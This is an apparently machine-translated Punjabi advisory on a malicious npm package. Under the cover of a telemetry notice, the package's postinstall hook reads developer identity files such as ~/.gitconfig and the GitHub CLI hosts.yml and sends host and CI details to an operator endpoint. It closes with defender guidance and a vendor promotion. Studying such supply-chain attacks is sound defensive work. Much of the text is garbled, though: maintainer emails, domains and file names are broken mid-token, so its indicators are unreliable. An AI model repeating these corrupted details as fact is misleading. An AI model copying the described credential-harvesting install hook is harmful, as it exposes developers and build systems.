  • - ਇੱਕ ਤੇਜ਼ੀ ਨਾਲ ਪ੍ਰਕਾਸ਼ਿਤ ਸੰਸਕਰਣ ਪੌੜੀ ਵਿੱਚ ਇੱਕੋ ਜਿਹੀ ਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟ

 ਵਿਸ਼ੇਸ਼ਤਾ ਅਤੇ ਨਿਰੀਖਣ ਕੀਤਾ ਵਿਵਹਾਰ
ਅਸੀਂ ਪੈਕੇਜ ਅਤੇ ਰਜਿਸਟਰੀ ਮੈਟਾਡੇਟਾ ਰਿਕਾਰਡ ਤੋਂ ਇਲਾਵਾ ਕੁਝ ਵੀ ਨਹੀਂ ਦਿੰਦੇ।

ਰਿਕਾਰਡ ਦਾ npm ਰੱਖਿਅਕ ਖਾਤਾ `a ਹੈਆਈਲਸੀਮੋਨ,ਪਤੇ `a ਦੇ ਨਾਲiel@vigilance.security`।ਰਜਿਸਟਰੀ ਉਸ ਈਮੇਲ ਨੂੰ ਗੈਰ-ਪ੍ਰਮਾਣਿਤ ਅਤੇ ਖਾਤੇ ਦੀ ਸਰੋਤ-ਨਿਯੰਤਰਣ ਪਛਾਣ ਨੂੰ ਗੈਰ-ਪ੍ਰਮਾਣਿਤ ਵਜੋਂ ਸੂਚੀਬੱਧ ਕਰਦੀ ਹੈ। `pckage.json`,ਵੱਖਰੇ ਤੌਰ 'ਤੇ, ਲੇਖਕ ਨੂੰ "AI SDK ਗਾਈਡ" ਵਜੋਂ ਪੇਸ਼ ਕਰਦਾ ਹੈ।ello@ai-sdk.guide>`”`a ਦੇ ਹੋਮਪੇਜ ਦੇ ਨਾਲ-sdk.ਗਾਈਡ` ਅਤੇ `g` ਦੇ ਅਧੀਨ ਇੱਕ ਸਰੋਤ ਰਿਪੋਜ਼ਟਰੀthub.com/ai-sdk-guide` ਸੰਗਠਨ। ਪ੍ਰਕਾਸ਼ਨ ਖਾਤੇ ਦਾ ਈਮੇਲ ਡੋਮੇਨ (`vigilance.security`)ਅਤੇ ਪੈਕੇਜ ਵਿੱਚ ਲੇਖਕ ਪਛਾਣ (`a-sdk.ਗਾਈਡ`)ਵੱਖ-ਵੱਖ ਡੋਮੇਨ ਹਨ।

`ਏ-sdk.ਗਾਈਡ` ਇਹ ਲਾਈਵ ਹੈ ਅਤੇ ਜਵਾਬ ਦਿੰਦਾ ਹੈ, ਅਤੇ `/ਐਲੀਮੈਟਰੀ` ath ਹੱਲ ਕਰਦਾ ਹੈ — ਡੀਕੋਏ ਪਛਾਣ ਨੂੰ ਇੱਕ ਡੈੱਡ ਲਿੰਕ ਦੀ ਬਜਾਏ ਇੱਕ ਪਹੁੰਚਯੋਗ ਵੈੱਬ ਮੌਜੂਦਗੀ ਦੁਆਰਾ ਸਮਰਥਤ ਕੀਤਾ ਜਾਂਦਾ ਹੈ, ਜੋ ਪੈਕੇਜ ਦੀ ਫਰੇਮਿੰਗ ਦੀ ਵਿਸ਼ਵਾਸਯੋਗਤਾ ਨੂੰ ਵਧਾਉਂਦਾ ਹੈ।

**ਨਿਰੀਖਣਯੋਗ ਸਮਰੱਥਾ।** ਇੰਸਟਾਲ ਸਮੇਂ, ਪੈਕੇਜ ਡਿਵੈਲਪਰ ਪਛਾਣ ਅਤੇ ਖਾਤਾ-ਸੰਰਚਨਾ ਫਾਈਲਾਂ ਨੂੰ ਪੜ੍ਹਦਾ ਹੈ, ਹੋਸਟ ਅਤੇ CI ਵਾਤਾਵਰਣ ਨੂੰ ਫਿੰਗਰਪ੍ਰਿੰਟ ਕਰਦਾ ਹੈ, ਅਤੇ ਨਤੀਜੇ ਨੂੰ ਇੱਕ ਓਪਰੇਟਰ-ਨਿਯੰਤਰਿਤ ਅੰਤਮ ਬਿੰਦੂ ਤੇ ਸੰਚਾਰਿਤ ਕਰਦਾ ਹੈ, ਜਦੋਂ ਕਿ ਇੱਕ ਨੋਟਿਸ ਪ੍ਰਦਰਸ਼ਿਤ ਕਰਦਾ ਹੈ ਜੋ ਇੱਕ ਸੰਕੁਚਿਤ ਅਤੇ ਅਗਿਆਤ ਡੇਟਾ ਸੈੱਟ ਦਾ ਵਰਣਨ ਕਰਦਾ ਹੈ। ਅਸੀਂ ਇਸ ਵਿਵਹਾਰ ਦਾ ਵਰਣਨ ਕਰਦੇ ਹਾਂ; ਅਸੀਂ ਇਸਦੇ ਲਈ ਕੋਈ ਉਦੇਸ਼ ਨਹੀਂ ਦੱਸਦੇ। ਪੈਕੇਜ ਦਾ ਮੁਲਾਂਕਣ ਕਰਨ ਵਾਲੇ ਪਾਠਕਾਂ ਨੂੰ - ਪ੍ਰਕਾਸ਼ਨ ਪਛਾਣ ਨੂੰ ਪਛਾਣਨ ਵਾਲੀ ਕੋਈ ਵੀ ਧਿਰ ਸਮੇਤ - ਦੱਸੇ ਗਏ ਅਤੇ ਅਸਲ ਡੇਟਾ ਪ੍ਰਵਾਹ ਦੇ ਵਿਚਕਾਰ ਦੇਖਣਯੋਗ ਬੇਮੇਲਤਾ ਨੂੰ ਤੋਲਣਾ ਚਾਹੀਦਾ ਹੈ।

ਡਿਫੈਂਡਰਾਂ ਲਈ ਪ੍ਰਭਾਵ, ਰੁਝਾਨ ਅਤੇ ਮਾਰਗਦਰਸ਼ਨ

ਕੌਣ ਬੇਨਕਾਬ ਹੋਇਆ ਹੈ। ਕੋਈ ਵੀ ਜੋ ਇੰਸਟਾਲ ਕਰਦਾ ਹੈ ਏਆਈ-ਐਸਡੀਕੇ-ਹੈਲਪਰਸ — ਸਿੱਧੇ ਤੌਰ 'ਤੇ ਜਾਂ ਇੱਕ ਪਰਿਵਰਤਨਸ਼ੀਲ ਨਿਰਭਰਤਾ ਦੇ ਤੌਰ 'ਤੇ — ਉਸ ਮਸ਼ੀਨ 'ਤੇ ਸੰਗ੍ਰਹਿ ਚਲਾਉਂਦਾ ਹੈ। ਕਿਉਂਕਿ ਟਰਿੱਗਰ ਹੈ ਪੋਸਟਇੰਸਟਾਲ, ਇਸ਼ਤਿਹਾਰੀ ਲਾਇਬ੍ਰੇਰੀ ਕੋਡ ਨੂੰ ਡੇਟਾ ਪ੍ਰਵਾਹ ਹੋਣ ਲਈ ਕਦੇ ਵੀ ਆਯਾਤ ਨਹੀਂ ਕਰਨਾ ਪੈਂਦਾ; ਸਿਰਫ਼ ਇੰਸਟਾਲ ਕਰਨਾ ਹੀ ਕਾਫ਼ੀ ਹੈ। ਸਭ ਤੋਂ ਵੱਧ-ਮੁੱਲ ਵਾਲੇ ਵਾਤਾਵਰਣ ਡਿਵੈਲਪਰ ਵਰਕਸਟੇਸ਼ਨ ਹਨ ਜਿਨ੍ਹਾਂ ਵਿੱਚ ਇੱਕ ਕੌਂਫਿਗਰਡ ਗਿੱਟ ਪਛਾਣ ਅਤੇ ਇੱਕ ਪ੍ਰਮਾਣਿਤ ਗਿੱਟਹੱਬ CLI, ਅਤੇ CI ਰਨਰ ਹਨ, ਜਿੱਥੇ ਸਕ੍ਰਿਪਟ ਦਾ CI-ਪ੍ਰਦਾਤਾ ਖੋਜ ਦਰਸਾਉਂਦਾ ਹੈ ਕਿ ਸੰਗ੍ਰਹਿ ਬਿਲਡ ਦੇ ਅੰਦਰ ਚੱਲਣ ਦੀ ਉਮੀਦ ਹੈ। pipelines ਦੇ ਨਾਲ ਨਾਲ ਲੈਪਟਾਪਾਂ 'ਤੇ ਵੀ।

ਇਹ ਕੀ ਪ੍ਰਗਟ ਕਰਦਾ ਹੈ। ਆਮ ਮਾਮਲੇ ਵਿੱਚ ਐਪਲੀਕੇਸ਼ਨ ਸੀਕਰੇਟ ਨਹੀਂ — ਪੇਲੋਡ ਕੇਂਦਰਿਤ ਹੈ ਪਛਾਣ: ਡਿਵੈਲਪਰ ਦਾ commit ਈਮੇਲ, ਉਹਨਾਂ ਦੇ GitHub ਖਾਤੇ ਦਾ ਨਾਮ ਅਤੇ ਈਮੇਲ, ਮਸ਼ੀਨ ਅਤੇ ਖਾਤੇ ਦੇ ਨਾਮ, ਅਤੇ ਪ੍ਰੋਜੈਕਟ ਮਾਰਗ। ਇਹ ਇੱਕ ਪੂਰਵ ਹੈcisਪੈਕੇਜ ਕਿਸਨੇ, ਕਿਸ ਮਸ਼ੀਨ 'ਤੇ, ਕਿਸ ਰਿਪੋਜ਼ਟਰੀ ਵਿੱਚ, ਅਤੇ ਕਿਸ CI ਸਿਸਟਮ ਦੇ ਅਧੀਨ ਸਥਾਪਿਤ ਕੀਤਾ ਹੈ, ਦਾ ਨਕਸ਼ਾ। ਇੱਕ ਸੰਗਠਨ ਲਈ, ਇਕੱਠੇ ਲਏ ਗਏ ਅਜਿਹੇ ਕੁਝ ਰਿਕਾਰਡ ਇਹ ਦਰਸਾਉਣਗੇ ਕਿ ਕਿਹੜੇ ਇੰਜੀਨੀਅਰ ਅਤੇ ਕਿਹੜੇ ਬਿਲਡ ਸਿਸਟਮ ਨਿਰਭਰਤਾ ਨੂੰ ਖਿੱਚਦੇ ਹਨ - ਵਧੇਰੇ ਨਿਸ਼ਾਨਾਬੱਧ ਫਾਲੋ-ਆਨ ਗਤੀਵਿਧੀ ਦੇ ਪੂਰਵਗਾਮੀ ਵਜੋਂ ਉਪਯੋਗੀ, ਭਾਵੇਂ ਇਸ ਪੈਕੇਜ ਦਾ ਆਪਣਾ ਵਿਵਹਾਰ ਸੰਗ੍ਰਹਿ ਅਤੇ ਪ੍ਰਸਾਰਣ 'ਤੇ ਰੁਕ ਜਾਂਦਾ ਹੈ।

ਰੁਝਾਨ: ਕਵਰ ਦੇ ਤੌਰ 'ਤੇ ਟੈਲੀਮੈਟਰੀ। ਜਾਇਜ਼ ਡਿਵੈਲਪਰ ਟੂਲ ਗੁਮਨਾਮ ਇੰਸਟਾਲ ਡਾਇਗਨੌਸਟਿਕਸ, ਅਤੇ ਇਸਨੂੰ ਸਤਿਕਾਰ ਨਾਲ ਕਰਨ ਲਈ ਪਰੰਪਰਾਵਾਂ ਨੂੰ ਇਕੱਠਾ ਕਰਦੇ ਹਨ - ਇੱਕ ਖੁਲਾਸਾ ਨੋਟਿਸ, ਇੱਕ ਟਰੈਕ ਨਾ ਕਰੋ ਸਨਮਾਨ, ਇੱਕ ਔਪਟ-ਆਉਟ ਫਲੈਗ, ਇੱਕ ਨੀਤੀ URL — ਚੰਗੀ ਤਰ੍ਹਾਂ ਜਾਣੇ ਜਾਂਦੇ ਹਨ। ਏਆਈ-ਐਸਡੀਕੇ-ਹੈਲਪਰਸ ਇਹਨਾਂ ਚਾਰਾਂ ਪਰੰਪਰਾਵਾਂ ਨੂੰ ਵਫ਼ਾਦਾਰੀ ਨਾਲ ਦੁਬਾਰਾ ਤਿਆਰ ਕਰਦਾ ਹੈ ਅਤੇ ਉਹਨਾਂ ਨੂੰ ਪਛਾਣ ਸੰਗ੍ਰਹਿ ਲਈ ਰੈਪਰ ਵਜੋਂ ਵਰਤਦਾ ਹੈ। ਇੱਕ ਸਹਿਮਤੀ ਬੈਨਰ, ਇੱਕ ਕਾਰਜਸ਼ੀਲ ਔਪਟ-ਆਉਟ, ਜਾਂ ਇੱਕ ਗੋਪਨੀਯਤਾ-ਨੀਤੀ ਲਿੰਕ ਦੀ ਮੌਜੂਦਗੀ ਇਸ ਗੱਲ ਦਾ ਸਬੂਤ ਨਹੀਂ ਹੈ ਕਿ ਇੱਕ ਪੈਕੇਜ ਭਰੋਸੇਯੋਗ ਹੈ; ਉਹ ਨਿਯੰਤਰਣ ਨਕਲ ਕਰਨ ਲਈ ਸਸਤੇ ਹਨ। ਇੱਕੋ ਇੱਕ ਭਰੋਸੇਯੋਗ ਜਾਂਚ ਇਹ ਹੈ ਕਿ ਕੋਡ ਅਸਲ ਵਿੱਚ ਕੀ ਪੜ੍ਹਦਾ ਹੈ ਅਤੇ ਇਹ ਅਸਲ ਵਿੱਚ ਇਸਨੂੰ ਕਿੱਥੇ ਭੇਜਦਾ ਹੈ।

ਇਸ ਪੈਕੇਜਿੰਗ ਦਾ ਆਟੋਮੇਟਿਡ ਟ੍ਰਾਈਏਜ 'ਤੇ ਵੀ ਮਾਪਣਯੋਗ ਪ੍ਰਭਾਵ ਪੈਂਦਾ ਹੈ। ਸਾਰੇ ਸੰਸਕਰਣਾਂ ਵਿੱਚ ਸਾਡੇ pipeline ਸਮੀਖਿਆ ਕੀਤੀ ਗਈ, ਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟ ਦੀਆਂ ਸਾਦੀਆਂ-ਭਾਸ਼ਾ ਦੀਆਂ ਟਿੱਪਣੀਆਂ, ਢਾਂਚਾਗਤ ਖੇਤਰ ਦੇ ਨਾਮ, ਅਤੇ ਰਵਾਇਤੀ ਔਪਟ-ਆਉਟ ਗੇਟ ਨੂੰ ਆਮ ਟੈਲੀਮੈਟਰੀ ਵਜੋਂ ਸਕੋਰ ਕੀਤਾ ਗਿਆ: ਅੱਠ ਵਿੱਚੋਂ ਸੱਤ ਵਾਪਸ ਆਏ ਅਨਿਯਮਤ ML ਵਰਗੀਕਰਣ ਤੋਂ, ਨਾ ਕਿ ਖਤਰਨਾਕ ਤੋਂ। ਅਸਪਸ਼ਟਤਾ ਨੂੰ ਹੱਲ ਕਰਨ ਵਾਲਾ ਸਿਗਨਲ ਗੱਦ ਵਿੱਚ ਨਹੀਂ ਹੈ - ਇਹ ਉਹਨਾਂ ਖਾਸ ਫਾਈਲਾਂ ਵਿੱਚ ਹੈ ਜੋ ਸਕ੍ਰਿਪਟ ਖੋਲ੍ਹਦੀ ਹੈ (~/.gitconfig, ~/.config/gh/hosts.yml) ਅਤੇ ਉਸ ਮੰਜ਼ਿਲ 'ਤੇ ਜਿਸ ਨੂੰ ਇਹ ਭੇਜਦਾ ਹੈ। ਇੱਕ ਸਮੀਖਿਅਕ, ਸਵੈਚਾਲਿਤ ਜਾਂ ਮਨੁੱਖੀ, ਜੋ ਖੁਲਾਸਾ ਪੜ੍ਹਦਾ ਹੈ ਅਤੇ ਉੱਥੇ ਰੁਕਦਾ ਹੈ, ਗਲਤ ਸਿੱਟੇ 'ਤੇ ਪਹੁੰਚੇਗਾ; ਦ੍ਰਿੜਤਾ ਡੇਟਾ-ਪ੍ਰਵਾਹ ਤੱਥਾਂ ਤੋਂ ਆਉਣੀ ਚਾਹੀਦੀ ਹੈ।

ਡਿਫੈਂਡਰਾਂ ਲਈ ਮਾਰਗਦਰਸ਼ਨ:

  • ਡਿਫਾਲਟ ਤੌਰ 'ਤੇ ਅਯੋਗ ਸਕ੍ਰਿਪਟਾਂ ਨਾਲ ਇੰਸਟਾਲ ਕਰੋ — npm ਇੰਸਟਾਲ - ਅਣਡਿੱਠਾ-ਸਕ੍ਰਿਪਟਾਂ, ਜਾਂ ਸੈੱਟ ਕਰੋ ਅਣਦੇਖਾ-ਸਕ੍ਰਿਪਟਾਂ = ਸੱਚ in .npmrc ਅਤੇ ਸਪੱਸ਼ਟ ਤੌਰ 'ਤੇ ਜਾਂਚੇ ਗਏ ਬਿਲਡ ਸਟੈਪਸ ਚਲਾਓ। ਇਹ ਬੇਅਸਰ ਕਰਦਾ ਹੈ ਪੋਸਟਇੰਸਟਾਲ-ਬੋਰਡ ਭਰ ਵਿੱਚ ਸੰਗ੍ਰਹਿ ਨੂੰ ਚਾਲੂ ਕੀਤਾ।
  • ਔਪਟ-ਆਉਟ ਕੰਟਰੋਲਾਂ ਨੂੰ ਭਰੋਸੇ ਦੇ ਸੰਕੇਤਾਂ ਵਜੋਂ ਨਾ ਸਮਝੋ। A ਟਰੈਕ ਨਾ ਕਰੋ check ਜਾਂ "ਟੈਲੀਮੈਟਰੀ ਨੀਤੀ" ਲਿੰਕ ਤੁਹਾਨੂੰ ਉਸ ਡੇਟਾ ਬਾਰੇ ਕੁਝ ਨਹੀਂ ਦੱਸਦਾ ਜੋ ਸਕ੍ਰਿਪਟ ਗੇਟ ਸੈੱਟ ਨਾ ਹੋਣ 'ਤੇ ਇਕੱਠਾ ਕਰਦੀ ਹੈ।
  • ਏਆਈ-ਈਕੋਸਿਸਟਮ ਸਹਾਇਕ ਪੈਕੇਜਾਂ ਨੂੰ ਅਪਣਾਉਣ ਤੋਂ ਪਹਿਲਾਂ ਇੰਸਟਾਲ ਹੁੱਕ ਨੂੰ ਪੜ੍ਹੋ। ਵਰਸੇਲ ਏਆਈ ਐਸਡੀਕੇ ਸਪੇਸ ਇੱਕ ਤੇਜ਼-ਮੂਵਿੰਗ, ਉੱਚ-ਭਰੋਸੇਯੋਗ ਟੀਚਾ ਹੈ; ਇੱਕ ਪੋਸਟਇੰਸਟਾਲ ਜੋ ਛੂਹਦਾ ਹੈ ~/.gitconfig or ~/.config/gh/ ਆਲੇ ਦੁਆਲੇ ਦੀਆਂ ਟਿੱਪਣੀਆਂ ਕਿਵੇਂ ਵੀ ਲਿਖੀਆਂ ਜਾਣ, ਇਹ ਇੱਕ ਸਪੱਸ਼ਟ ਸੰਕੇਤ ਹੈ।
  • ਬਿਲਡ-ਟਾਈਮ ਨਿਕਾਸ ਦੀ ਨਿਗਰਾਨੀ ਕਰੋ। ਇਸ ਦੌਰਾਨ ਇੱਕ ਆਊਟਬਾਊਂਡ HTTPS POST npm ਇੰਸਟਾਲ, ਖਾਸ ਤੌਰ 'ਤੇ ਇੱਕ ਤਾਜ਼ੇ ਪ੍ਰੋਵਿਜ਼ਨ ਕੀਤੇ ਕਲਾਉਡ-ਫੰਕਸ਼ਨ ਐਂਡਪੁਆਇੰਟ ਲਈ, ਨੈੱਟਵਰਕ ਲੇਅਰ 'ਤੇ ਦੇਖਣਯੋਗ ਹੈ ਅਤੇ CI ਵਾਤਾਵਰਣ ਲਈ ਇੱਕ ਮਜ਼ਬੂਤ ​​ਖੋਜ ਬਿੰਦੂ ਹੈ।
  • ਸੰਕੁਚਿਤ ਸੰਸਕਰਣ ਪੌੜੀਆਂ ਲਈ ਵੇਖੋ। ਇੱਕ ਪੈਕੇਜ ਜਿਸਦਾ ਪੂਰਾ ਅਰਥ-ਸੰਸਕਰਣ ਇਤਿਹਾਸ ਸਕਿੰਟਾਂ ਦੇ ਅੰਦਰ ਦਿਖਾਈ ਦਿੰਦਾ ਹੈ, ਇੱਕ ਨਾ ਬਦਲਣ ਵਾਲੀ ਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟ ਦੇ ਨਾਲ, ਇੱਕ ਨਿਰਮਿਤ ਰੱਖ-ਰਖਾਅ ਇਤਿਹਾਸ ਪੇਸ਼ ਕਰ ਰਿਹਾ ਹੈ।
sca-ਟੂਲਜ਼-ਸਾਫਟਵੇਅਰ-ਰਚਨਾ-ਵਿਸ਼ਲੇਸ਼ਣ-ਟੂਲਜ਼
ਆਪਣੇ ਸਾਫਟਵੇਅਰ ਜੋਖਮਾਂ ਨੂੰ ਤਰਜੀਹ ਦਿਓ, ਸੁਧਾਰੋ ਅਤੇ ਸੁਰੱਖਿਅਤ ਕਰੋ
ਆਪਣਾ ਮੁਫ਼ਤ ਖਾਤਾ ਪ੍ਰਾਪਤ ਕਰੋ।
ਕੋਈ ਕ੍ਰੈਡਿਟ ਕਾਰਡ ਦੀ ਲੋੜ ਨਹੀਂ ਹੈ

ਆਪਣੇ ਸਾਫਟਵੇਅਰ ਵਿਕਾਸ ਅਤੇ ਡਿਲੀਵਰੀ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕਰੋ

ਜ਼ਾਇਜੇਨੀ ਪ੍ਰੋਡਕਟ ਸੂਟ ਦੇ ਨਾਲ